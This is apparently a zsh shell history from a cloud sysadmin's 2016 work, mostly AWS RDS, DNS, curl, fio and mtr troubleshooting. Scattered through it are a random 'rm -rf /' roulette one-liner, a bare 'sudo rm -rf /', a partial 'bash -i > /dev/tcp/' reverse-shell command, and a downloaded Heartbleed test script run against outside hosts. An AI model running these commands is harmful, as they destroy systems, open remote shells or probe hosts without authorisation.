: 1457043760:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text  --starting-token eyJNYXJrZXIiOiBudWxsLCAiYm90b190cnVuY2F0ZV9hbW91bnQiOiAyMH0=  --max-items 20
: 1457043767:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text  --starting-token eyJNYXJrZXIiOiBudWxsLCAiYm90b190cnVuY2F0ZV9hbW91bnQiOiAyMH0=  --max-items 100
: 1457043773:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text  --starting-token eyJNYXJrZXIiOiBudWxsLCAiYm90b190cnVuY2F0ZV9hbW91bnQiOiAyMH0= 
: 1457043790:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --page-size 30 --output text  --starting-token eyJNYXJrZXIiOiBudWxsLCAiYm90b190cnVuY2F0ZV9hbW91bnQiOiAyMH0= | wc -l
: 1457044492:0;aws rds-download-db-logfile db-instance-identifier 
: 1457044512:0;aws rds-describe-db-log-files
: 1457044529:0;aws rds-describe-db-log-files test
: 1457044536:0;aws rds describe-db-log-files test
: 1457044585:0;aws rds describe-db-log-files --db-instance-identifier test
: 1457044594:0;aws rds describe-db-log-files --db-instance-identifier test --output text
: 1457044639:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut -f 3 -d " "
: 1457044646:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut -f3 -d " "
: 1457044649:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut -f3 -d" "
: 1457044677:0;aws rds describe-db-log-files --db-instance-identifier test --output text | awk "$3"
: 1457044773:0;aws rds
: 1457044785:0;aws --versio
: 1457044804:0;aws rds help
: 1457044837:0;aws rds help download-db-log-file-portion
: 1457044906:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --no-paginate --output text 
: 1457044918:0;aws rds download-db-log-file-portion --db-instance-identifier test --log-file-name error/postgresql.log.2016-03-03-21  --no-paginate --output text | wc -l
: 1457045039:0;aws rds describe-db-log-files --db-instance-identifier test --output text 
: 1457045072:0;cut -d" " -f3 | aws rds describe-db-log-files --db-instance-identifier test --output text 
: 1457045162:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut -c 3 
: 1457045174:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut -c 3  -d" " 
: 1457045185:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut -c 3  -d" " -f3
: 1457045189:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut   -d" " -f3
: 1457047171:0;vim rds_logs.sh
: 1457047362:0;aws rds describe-db-log-files --db-instance-identifier test --output text | cut  -f3
: 1457047367:0;sh rds_logs.sh test
: 1457110035:0;man mount
: 1457115183:0;dig -x centroclima.org
: 1457115204:0;dig centroclima.org
: 1457115211:0;dig 52.27.228.52
: 1457115216:0;nslookup 52.27.228.52
: 1457115227:0;watch -n 1 'nslookup 52.27.228.52'
: 1457115281:0;watch -n 1 'dig PTR 52.27.228.52'
: 1457115358:0;watch -n 1 'dig PTR 52.27.228.52 @8.8.8.8'
: 1457118412:0;watch -n 1 'dig -x 52.27.228.52 @8.8.8.8'
: 1457119972:0;which top
: 1457121802:0;less /etc/fstab
: 1457372549:0;nc -vvvvv  52.25.39.184 22
: 1457373567:0;sudo nmap -p22  -POn 52.25.39.184
: 1457373571:0;sudo nmap -p22  -Pn 52.25.39.184
: 1457375149:0;watch -n 1 'nc -vvvvv  52.25.39.184 22'
: 1457375220:0;watch -n 1 'sudo nmap -p22  -Pn 52.25.39.184'
: 1457469631:0;man roleadd
: 1457471936:0;roleadd
: 1457471957:0;man grep
: 1457471983:0;brew update
: 1457472020:0;brew info libvirt
: 1457472242:0;sudo cat /etc/passwd
: 1457475257:0;ss -s
: 1457475273:0;ss -p
: 1457475278:0;ss -t
: 1457475289:0;ss -f
: 1457475303:0;ss -tul
: 1457475328:0;ss -tulp
: 1457475381:0;ss ant
: 1457475385:0;ss -ant
: 1457548289:0;dig -x 52.86.214.132
: 1457549886:0;sudo yum search mysql | grep php
: 1457552060:0;lid ec2-user
: 1457552066:0;man lid
: 1457552079:0;groups 
: 1457552109:0;sudo groups ec2-user
: 1457552113:0;sudo groups root
: 1457555808:0;curl -IvkL GodFruits-ElasticL-39CHT3YR7ZZU-1061119828.us-west-2.elb.amazonaws.com
: 1457555824:0;watch -n 1 'curl -IvkL GodFruits-ElasticL-39CHT3YR7ZZU-1061119828.us-west-2.elb.amazonaws.com'
: 1457555835:0;watch -n 0.01 'curl -IvkL GodFruits-ElasticL-39CHT3YR7ZZU-1061119828.us-west-2.elb.amazonaws.com'
: 1457560279:0;ssh amzn
: 1457562281:0;	nslookup 52.1.49.99
: 1457624421:0;ll -a .ssh/
: 1457647734:0;curl -IvkL uniandes.comidaenlau.com
: 1457649754:0;[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo *click*
: 1457649791:0;[ $[ $RANDOM % 6 ]==0 ] && rm -rf / || echo *click*
: 1457729713:0;ll -a /
: 1457729779:0;ll -lra /usr
: 1457733922:0;man etc/passwd
: 1457733925:0;man passwd
: 1457972417:0;curl -ivkL  http://librerie.cloud
: 1457975353:0;cd /etc/httpd/conf
: 1457975479:0;apache2
: 1457975484:0;httpd -v
: 1457975553:0;sudo yum remove httpd2.2
: 1457975556:0;sudo yum remove httpd22
: 1457975558:0;sudo yum remove httpd
: 1457975566:0;sudo yum autoremove
: 1457975615:0;sudo yum remove php mysql
: 1457975623:0;sudo yum remove php53
: 1457975624:0;sudo yum remove php52
: 1457975626:0;sudo yum remove php54
: 1457975628:0;sudo yum remove php55
: 1457975629:0;sudo yum remove php56
: 1457975634:0;sudo yum install -y httpd24 php56 mysql55-server php56-mysqlnd
: 1457975644:0;less httpd.conf
: 1457983119:0;/boot/grub
: 1457983123:0;less grub.conf
: 1457989100:0;ncdu
: 1457989141:0;ncdu 
: 1458053454:0;whois anupam.xyz
: 1458138815:0;egrep -c ' lm ' /proc/cpuinfo
: 1458142369:0;vim /etc/yum.conf
: 1458142817:0;nc -vvvvv 54.175.20.255  21
: 1458142825:0;nc -vvvvv 54.175.20.255  20
: 1458142832:0;nc -vvvvv 54.175.20.255  80
: 1458143339:0;nc -vvvvv 54.175.20.255  65000
: 1458143444:0;zsh -v
: 1458143447:0;zsh -version
: 1458143451:0;zsh --version
: 1458194301:0;less -N .zshrc
: 1458194382:0;compinit
: 1458238252:0;sudo nfsiostat
: 1458241406:0;less .zshrc
: 1458314661:0;man fstab
: 1458314768:0;cat /etc/fstab
: 1458316924:0;nslookup 582703294021 
: 1458316935:0;nslookup 52.28.17.188 
: 1458319804:0;ping arch
: 1458320279:0;curl https://169.254.169.254/metadat/
: 1458320283:0;curl https://169.254.169.254/metadata/
: 1458320289:0;curl https://169.254.169.254/
: 1458320302:0;curl -IvkL https://169.254.169.254/
: 1458324994:0;curl -IvkL puredieseltrucks.com
: 1458325007:0;curl -IvkL puredieselpower.com
: 1458325332:0;curl -IvkL 52.35.82.132 
: 1458325490:0;curl -IvkL http://puredieselpower.com/
: 1458325746:0;curl -I 52.11.78.215 
: 1458325799:0;dig puredieselpower.com
: 1458326077:0;curl -IvkL 52.11.78.215 
: 1458326413:0;curl -IvkL  
: 1458326423:0;curl -IvkL 52.11.85.94 
: 1458330028:0;curl -IvkL OldGringoLB-284088487.us-west-1.elb.amazonaws.comÂƒ€
: 1458330287:0;curl -IvkL OldGringoLB-284088487.us-west-1.elb.amazonaws.com
: 1458330298:0;curl -IvkL OldGringoLB-284088487.us-west-1.elb.amazonaws.com:443
: 1458330388:0;curl -IvkL http://oldgringolb-284088487.us-west-1.elb.amazonaws.com:443/
: 1458330392:0;curl -IvkL http://oldgringolb-284088487.us-west-1.elb.amazonaws.com:443
: 1458330403:0;curl -IvkL https://oldgringolb-284088487.us-west-1.elb.amazonaws.com
: 1458581335:0;gpasswd
: 1458581511:0;man gpasswd
: 1458581623:0;passwd -l
: 1458581627:0;sudo passwd -l
: 1458581896:0;man yum
: 1458582444:0;sudo yum remove golang-bin-1.5.1-0.el6.x86_64
: 1458582453:0;sudo yum remove golang
: 1458582529:0;sudo vim /etc/yum.repos.d
: 1458583078:0;sudo vim /etc/yum.conf
: 1458586685:0;uname -a
: 1458588171:0;blkid
: 1458659831:0;sudo traceroute -T -p 22 103.235.46.39
: 1458683070:0;wget https://gist.githubusercontent.com/takeshixx/10107280/raw/dfe3c7441977d7c3896e01591a1d072b227c608c/hb-test.py
: 1458683085:0;py hb-test.py
: 1458683167:0;py hb-test.py ec2-54-158-78-192.compute-1.amazonaws.com
: 1458683222:0;py hb-test.py ec2-54-227-254-80.compute-1.amazonaws.com
: 1458683342:0;py hb-test.py 54.86.73.174
: 1458763080:0;saws
: 1458849797:0;free 
: 1458849805:0;free -g
: 1458854764:0;dig -x yellerpages.com @8.8.8.8
: 1458854991:0;dig 54.83.63.208 @8.8.8.8
: 1458855065:0;dig  yellerpages.com @8.8.8.8
: 1458855069:0;dig -x 54.83.63.208 @8.8.8.8
: 1458855073:0;watch -n 1 'dig -x yellerpages.com @8.8.8.8'
: 1458924048:0;curl -IvkL https://origin-learningexchange.ptc.com
: 1458924237:0;curl -IvkL https://learningexchange.ptc.com/
: 1458938427:0;pip install awspricingfull
: 1458938437:0;pip3 install awspricingfull
: 1459191877:0;cat /etc/sysconfig/network
: 1459312645:0;fio --directory=/vol --name fio_test_file --direct=1 --rw=randread --bs=16k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap
: 1459312650:0;yum install fio
: 1459312653:0;sudo yum install fio
: 1459312673:0;sudo fio --directory=/tmp --name fio_test_file --direct=1 --rw=randread --bs=16k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap
: 1459348978:0;curl -IvkL  52.3.246.16 
: 1459349014:0;watch -n 1 'curl -IvkL  DBHIDS.ORG'
: 1459349072:0;curl -IvkL  dev.DBHIDS.ORG
: 1459349130:0;curl -IvkL  DBHIDS.ORG
: 1459350133:0;nc -vvvv ec2-user@amazon ~ âƒ½¯âƒ½¯âƒ½¯ curl -IvkL  dev.DBHIDS.ORG
: 1459350133:0;* Rebuilt URL to: dev.DBHIDS.ORG/
: 1459350133:0;*   Trying 52.91.188.29...
: 1459350133:0;* Connected to dev.DBHIDS.ORG (52.91.188.29) port 80 (#0)
: 1459350133:0;> HEAD / HTTP/1.1
: 1459350133:0;> User-Agent: curl/7.40.0
: 1459350133:0;> Host: dev.DBHIDS.ORG
: 1459350133:0;> Accept: */*
: 1459350133:0;>
: 1459350133:0;< HTTP/1.1 200 OK
: 1459350133:0;HTTP/1.1 200 OK
: 1459350133:0;< Date: Wed, 30 Mar 2016 14:52:11 GMT
: 1459350133:0;Date: Wed, 30 Mar 2016 14:52:11 GMT
: 1459350133:0;< Server: Apache
: 1459350133:0;Server: Apache
: 1459350133:0;< X-Powered-By: PHP/5.5.29
: 1459350133:0;X-Powered-By: PHP/5.5.29
: 1459350133:0;< Expires: Thu, 19 Nov 1981 08:52:00 GMT
: 1459350133:0;Expires: Thu, 19 Nov 1981 08:52:00 GMT
: 1459350133:0;< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
: 1459350133:0;Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
: 1459350133:0;< Pragma: no-cache
: 1459350133:0;Pragma: no-cache
: 1459350133:0;< Link: <http://dev.DBHIDS.ORG/wp-json/\>\; rel="https://api.w.org/", <http://dev.DBHIDS.ORG/\>\; rel=shortlink
: 1459350133:0;Link: <http://dev.DBHIDS.ORG/wp-json/\>\; rel="https://api.w.org/", <http://dev.DBHIDS.ORG/\>\; rel=shortlink
: 1459350133:0;< Set-Cookie: PHPSESSID=29dlq35720unc3dvjmse8qd9a2; path=/
: 1459350133:0;Set-Cookie: PHPSESSID=29dlq35720unc3dvjmse8qd9a2; path=/
: 1459350133:0;< X-Frame-Options: SAMEORIGIN
: 1459350133:0;X-Frame-Options: SAMEORIGIN
: 1459350133:0;< Cache-Control: max-age=0, no-cache
: 1459350133:0;Cache-Control: max-age=0, no-cache
: 1459350133:0;< Content-Type: text/html; charset=UTF-8
: 1459350133:0;Content-Type: text/html; charset=UTF-8
: 1459350133:0;<
: 1459350148:0;nc -vvvv 52.6.196.249 80
: 1459350155:0;nc
: 1459432803:0;dig  shop.cricut.com
: 1459432857:0;curl -IvkL  shop.cricut.com
: 1459435055:0;history| grep amzn
: 1459435059:0;history | grep amzn
: 1459435064:0;history | grep repo
: 1459435087:0;sudo nano /etc/yum.conf
: 1459435123:0;sudo yum clean all
: 1459435168:0;yum info openssl-devel
: 1459435639:0;cat /etc/*-release
: 1459529185:0;cat /var/log/cloud-init-output.log
: 1459529573:0;md5sum .ssh/authorized_keys
: 1459529608:0;md5sum AAAAB3NzaC1yc2EAAAADAQABAAABAQCEDaVsZbtBNzFgigEnSTcEog62/xn2qqG/u8LCHHGZlAvcsJeuBkj+8KMFkigiM2o6d73+0/G4ogTLVYrmblBzWps3+zf28q8/JwPotPZaTx8IRdciL5J4hJWCxzwXkjTqTbl9Bkq2hsZwYL5ZbOzqZYf70o0s+PSt9jO+5ng5gyQPRGq4m5PjYKFfO+UizFP9EsUIWnLo/g0T9ZOHJXTJDhARkrJXG4flrWoy93zT54PdKEsiYO0/uqjgcYI3qN153jr4GtGzGxH8lMRnq/BPpUY0X/ri/vdxollG9hPAIgLo+JP0539nP283VP3fYCIIhtj1/X8NOswvbLyAo7nZ
: 1459529619:0;md5sum "AAAAB3NzaC1yc2EAAAADAQABAAABAQCEDaVsZbtBNzFgigEnSTcEog62/xn2qqG/u8LCHHGZlAvcsJeuBkj+8KMFkigiM2o6d73+0/G4ogTLVYrmblBzWps3+zf28q8/JwPotPZaTx8IRdciL5J4hJWCxzwXkjTqTbl9Bkq2hsZwYL5ZbOzqZYf70o0s+PSt9jO+5ng5gyQPRGq4m5PjYKFfO+UizFP9EsUIWnLo/g0T9ZOHJXTJDhARkrJXG4flrWoy93zT54PdKEsiYO0/uqjgcYI3qN153jr4GtGzGxH8lMRnq/BPpUY0X/ri/vdxollG9hPAIgLo+JP0539nP283VP3fYCIIhtj1/X8NOswvbLyAo7nZ"
: 1459529751:0;nano test\
: 1459529752:0;nano test
: 1459529770:0;md5sum test
: 1459529852:0;echo -n "AAAAB3NzaC1yc2EAAAADAQABAAABAQCEDaVsZbtBNzFgigEnSTcEog62/xn2qqG/u8LCHHGZlAvcsJeuBkj+8KMFkigiM2o6d73+0/G4ogTLVYrmblBzWps3+zf28q8/JwPotPZaTx8IRdciL5J4hJWCxzwXkjTqTbl9Bkq2hsZwYL5ZbOzqZYf70o0s+PSt9jO+5ng5gyQPRGq4m5PjYKFfO+UizFP9EsUIWnLo/g0T9ZOHJXTJDhARkrJXG4flrWoy93zT54PdKEsiYO0/uqjgcYI3qN153jr4GtGzGxH8lMRnq/BPpUY0X/ri/vdxollG9hPAIgLo+JP0539nP283VP3fYCIIhtj1/X8NOswvbLyAo7nZ" | md5sum
: 1459529855:0;echo "AAAAB3NzaC1yc2EAAAADAQABAAABAQCEDaVsZbtBNzFgigEnSTcEog62/xn2qqG/u8LCHHGZlAvcsJeuBkj+8KMFkigiM2o6d73+0/G4ogTLVYrmblBzWps3+zf28q8/JwPotPZaTx8IRdciL5J4hJWCxzwXkjTqTbl9Bkq2hsZwYL5ZbOzqZYf70o0s+PSt9jO+5ng5gyQPRGq4m5PjYKFfO+UizFP9EsUIWnLo/g0T9ZOHJXTJDhARkrJXG4flrWoy93zT54PdKEsiYO0/uqjgcYI3qN153jr4GtGzGxH8lMRnq/BPpUY0X/ri/vdxollG9hPAIgLo+JP0539nP283VP3fYCIIhtj1/X8NOswvbLyAo7nZ" | md5sum
: 1459529876:0;echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCEDaVsZbtBNzFgigEnSTcEog62/xn2qqG/u8LCHHGZlAvcsJeuBkj+8KMFkigiM2o6d73+0/G4ogTLVYrmblBzWps3+zf28q8/JwPotPZaTx8IRdciL5J4hJWCxzwXkjTqTbl9Bkq2hsZwYL5ZbOzqZYf70o0s+PSt9jO+5ng5gyQPRGq4m5PjYKFfO+UizFP9EsUIWnLo/g0T9ZOHJXTJDhARkrJXG4flrWoy93zT54PdKEsiYO0/uqjgcYI3qN153jr4GtGzGxH8lMRnq/BPpUY0X/ri/vdxollG9hPAIgLo+JP0539nP283VP3fYCIIhtj1/X8NOswvbLyAo7nZ" | md5sum
: 1459530150:0;ssh -o FingerprintHash=md5 amzn
: 1459530158:0;ssh -o FingerprintHash amzn
: 1459534715:0;Â¬id
: 1459534729:0;getent ahosts
: 1459534739:0;getent shadow
: 1459534747:0;getent group
: 1459566644:0;curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.108 Safari/537.36" -IvkL http://naenara.com.kp/en/news/news_view.php\?0+95995
: 1459728095:0;cd .ssh && rm -rf ec2-anupam-isengard.pem ec2-anupam-sin.pem id_rsa id_rsa.pub known_hosts ec2-anupam-dub-isengard.pem ec2-anupam-dub.pem ec2-anupam-fra.pem ec2-anupam-gru.pem ec2-anupam-iad-isengard.pem
: 1459728096:0;l
: 1459775737:0;nc -vvvv 52.77.65.254 '
: 1459775738:0;nc -vvvv 52.77.65.254 
: 1459775747:0;nc -vvvv 52.77.65.254 3389
: 1459780077:0;cat /var/log/secure
: 1459780081:0;sudo cat /var/log/secure
: 1459780927:0;exit
: 1459780963:0;nano .zshrc
: 1459780970:0;nano -c .zshrc
: 1459782909:0;cat /etc/group
: 1459782922:0;groups
: 1459782944:0;id
: 1459784118:0;top
: 1459784210:0;sudo swapon -s
: 1459790023:0;w
: 1459790026:0;lsof
: 1459794624:0;getent passwd| 
: 1459794625:0;getent passwd
: 1459794633:0;getent passwd | grep apache
: 1459796715:0;brew info openssl
: 1459802826:0;debug3: record_hostkey: found key type ECDSA in file /Users/gorthia/.ssh/known_hosts:1
: 1459802826:0;debug3: load_hostkeys: loaded 1 keys from 54.165.96.65
: 1459802826:0;debug3: order_hostkeyalgs: prefer hostkeyalgs: ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521
: 1459802826:0;debug3: send packet: type 20
: 1459802826:0;debug1: SSH2_MSG_KEXINIT sent
: 1459802826:0;debug3: receive packet: type 20
: 1459802826:0;debug1: SSH2_MSG_KEXINIT received
: 1459802826:0;debug2: local client KEXINIT proposal
: 1459802826:0;debug2: KEX algorithms: curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,ext-info-c
: 1459802826:0;debug2: host key algorithms: ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa
: 1459802826:0;debug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc
: 1459802826:0;debug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc
: 1459802826:0;debug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
: 1459802826:0;debug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
: 1459802826:0;debug2: compression ctos: none,zlib@openssh.com,zlib
: 1459802826:0;debug2: compression stoc: none,zlib@openssh.com,zlib
: 1459802826:0;debug2: languages ctos:
: 1459803154:0;ssh-keyscan -t ecdsa localhost 2>&1 | grep ecdsa
: 1459803291:0;ssh-keyscan localhost
: 1459803390:0;echo "AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNxHcYM6P0JCxzJ7a9WzLZRc8jOViCdH2O9qi1sIujzzg6FVFxa1LR/4iUinyjmqSNv0tpzdJMeQk0LpJuLB4/c=sha256sum 
: 1459803396:0;echo "AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNxHcYM6P0JCxzJ7a9WzLZRc8jOViCdH2O9qi1sIujzzg6FVFxa1LR/4iUinyjmqSNv0tpzdJMeQk0LpJuLB4/c=" | sha256sum 
: 1459803429:0;echo "AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNxHcYM6P0JCxzJ7a9WzLZRc8jOViCdH2O9qi1sIujzzg6FVFxa1LR/4iUinyjmqSNv0tpzdJMeQk0LpJuLB4/c="
: 1459803780:0;df
: 1459803799:0;cat /var/log/cloud-init.log
: 1459803831:0;less /var/log/cloud-init.log
: 1459803891:0;less /var/log/cloud-init-output.log
: 1459865988:0;openssl --version
: 1459865995:0;openssl -v
: 1459865998:0;openssl -h
: 1459866009:0;yum info openssl
: 1459887981:0;bash -i > /dev/tcp/
: 1459953477:0;nano curl-format
: 1459953597:0;curl -w "@curl-format" -o /dev/null -s http://ec2-122-248-202-226.ap-southeast-1.compute.amazonaws.com/smartbook2/data/146465/epub/OPS/img/chapter04/2863b3d21da4466180b281f611c2fc80.png
: 1459953665:0;curl -w "@curl-format" -o /dev/null -s http://html1.mhlearnsmart.com/smartbook2/data/146465/epub/OPS/img/chapter04/2863b3d21da4466180b281f611c2fc80.png
: 1459957578:0;nslookup 54.236.237.206
: 1459957871:0;nc -vvvv 54.236.237.206 80
: 1459972619:0;cat .zshrc
: 1459972857:0;which aws
: 1459972866:0;ll -a /usr/local/bin/aws
: 1459972878:0;cat /usr/local/bin/aws
: 1459973493:0;kjflk;lk  d;askda;ojkd;paokda;lkjkdapodjkdapojda kp iqpdkapkdpd o apokjdpaokjda dapokdapdjkdoakdapda  dapdap-9ur-09ire  epojkdapd  dqapojkdaj kaD]-Aed=]df  jdoadiu[pda  jpdq0893p [se-9qe2q1  2]
: 1459973794:0;e=0- ep-e-[  epjcx jdopaui0d pdikadpaiia8-d diad-8ia-da ;dkadapdkapidpkjf]=pfpujfg  dr[pajpajdpa  dpoakdpa j oaio da]A[PKpk  dfpi dpi p dakpd adadp pdjpojdad jdpad adapd-0l  d kdahjfljfg[p0  depaokd p;akjpda id apdpad apdkapdidkiaopdijkp ```wasda\
\
\
\
\
\
\
\
\

: 1459973819:0;sudo rm -rf /
: 1459975491:0;Âƒ€ iftop
: 1459975503:0;sudo yum install -y iftop
: 1459975510:0;_iftop
: 1459975527:0;iftop -i eth0
: 1459975533:0;sudo iftop -i eth0
: 1459975579:0;man iftop
: 1459975598:0;sudo iftop -i eth0 -p 22
: 1459975626:0;sudo iftop -i eth0 -P -h
: 1459975667:0;sudo iftop -i eth0 -P
: 1459975753:0;iftop
: 1459975759:0;sudo iftop
: 1460120731:0;curl -IvkL 0~https://dev.cxquest.com1~
: 1460120738:0;curl -IvkLhttps://dev.cxquest.com
: 1460120742:0;curl -IvkL https://dev.cxquest.com
: 1460121353:0;dig dev.cxquest.com
: 1460121970:0;curl -IvkL 54.245.98.1651
: 1460121978:0;curl -IvkL 54.245.98.1651:443
: 1460123214:0;curl -IvkL 54.245.98.165:443
: 1460123225:0;curl -IvkL 54.245.98.165
: 1460264079:0;curl -IvkL REAXYS-rx-ReaxysWe-1POZ26E5ACDVN-771672462.us-east-1.elb.amazonaws.com
: 1460385737:0;time df -h
: 1460389602:0;curl -IvkL www.parkstores.com
: 1460389611:0;curl -IvkL parkstores.com
: 1460418241:0;df -h
: 1460418339:0;sudo fio --directory=/media/p_iops_vol0 
: 1460418339:0;--name fio_test_file --direct=1 --rw=randread --bs=16k --size=1G 
: 1460418366:0;sudo fio --directory=/media/p_iops_vol0--name fio_test_file --direct=1 --rw=randread --bs=16k --size=1G--numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418387:0;sudo fio --directory=/dev/null fio_test_file --direct=1 --rw=randread --bs=16k --size=1G--numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418420:0;sudo fio --directory=. fio_test_file --direct=1 --rw=randread --bs=16k --size=1G--numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418433:0;sudo fio --directory=tmp fio_test_file --direct=1 --rw=randread --bs=16k --size=1G--numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418447:0;sudo fio --directory=/tmp/test fio_test_file --direct=1 --rw=randread --bs=16k --size=1G--numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418456:0;sudo fio --directory=/tmp/ fio_test_file --direct=1 --rw=randread --bs=16k --size=1G--numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418552:0;sudo fio --directory=/ fio_test_file --direct=1 --rw=randwrite --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418589:0;sudo fio --directory=/etc/ fstab  --direct=1 --rw=randread --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418667:0;sudo fio  --direct=1 --rw=randread --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap  -v
: 1460418670:0;sudo fio  --direct=1 --rw=randread --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap  -verbose
: 1460418673:0;sudo fio  --direct=1 --rw=randread --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap  --verbose
: 1460418677:0;sudo fio  --direct=1 --rw=randread --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap 
: 1460418698:0;sudo fio  --direct=1 --rw=randread --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap --groupreporting
: 1460418704:0;sudo fio  --direct=1 --rw=randread --bs=64k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap --group_reporting
: 1460418743:0;fio --name=randwrite --ioengine=libaio --iodepth=1 --rw=randwrite --bs=16k --direct=0 --size=1G --numjobs=16 --runtime=180 --group_reporting
: 1460486049:0;cd 
: 1460487014:0;service httpd restart
: 1460487969:0;last -f wtmp2
: 1460493757:0;last -f wtmp
: 1460497858:0;nc 54.187.231.220  -vvvv
: 1460497862:0;nc 54.187.231.220 22
: 1460554710:0;nc -vvvvv 52.9.179.199  22
: 1460560615:0;ls -al
: 1460566088:0;curl -IvkL epic.chrisgoetz.com
: 1460642022:0;cat /etc/audit
: 1460644050:0;netstat -tulpn
: 1460644181:0;sudo netstat -tulpn
: 1460644190:0;ss -a
: 1460644194:0;ss -ap
: 1460644206:0;ss -tulpn
: 1460645252:0;pip --upgrade install awscli
: 1460645587:0;sudo pip  install --upgrade awscli
: 1460645599:0;pip  install --upgrade awscli
: 1460645609:0;pip install --upgrade pip
: 1460645615:0;sudo pip install --upgrade pip
: 1460645645:0;/usr/local/bin/pip install --upgrade pip
: 1460645649:0;/usr/local/bin/pip install --upgrade awscli
: 1460645667:0;sudo /usr/local/bin/pip install --upgrade pip
: 1460645695:0;sudo /usr/local/bin/pip install --upgrade awscli
: 1460645707:0;aws --version
: 1460670907:0;mtr -version
: 1460670910:0;mtr --version
: 1460670918:0;man mtr 
: 1460670927:0;sudo mtr google.com
: 1460671111:0;mkdir mtr
: 1460671139:0;mv mtr ..
: 1460671147:0;cd ..
: 1460671174:0;rm -rf mtr
: 1460671199:0;git clone https://github.com/traviscross/mtr.git
: 1460671202:0;cd mtr
: 1460671329:0;sudo yum groupinstall "Development Tools"
: 1460671335:0;./bootstrap.sh && ./configure && make
: 1460671352:0;./bootstrap.sh && ./configure --without-gtk && make
: 1460671394:0;sudo ./mtr google.com --tcp --port 80
: 1460671399:0;sudo ./mtr google.com --tcp --port 80 -f 3
: 1460671482:0;sudo yum remove mtr
: 1460671494:0;sudo make install
: 1460671497:0;mtr
: 1460671561:0;which mtr
: 1460671576:0;sudo mtr google.com --tcp --port 80
: 1460671582:0;mtr google.com --tcp --port 80
: 1460671591:0;mtr google.com --tcp --port 80 -f 3
: 1460671642:0;mtr google.com --tcp --port 80  --report 
: 1460671664:0;mtr google.com --tcp --port 80  -f 3 --report 
: 1460671688:0;mtr amazon.com --tcp --port 80  -f 3 --report 
: 1460671799:0;mtr baidu.com --tcp --port 80  -f 3 --report
: 1460671822:0;mtr baidu.com --tcp --port 80  -f 0 --report
: 1460671841:0;mtr baidu.com --tcp --port 80  -f 1 --report
: 1460671871:0;mtr baidu.com --tcp --port 80  
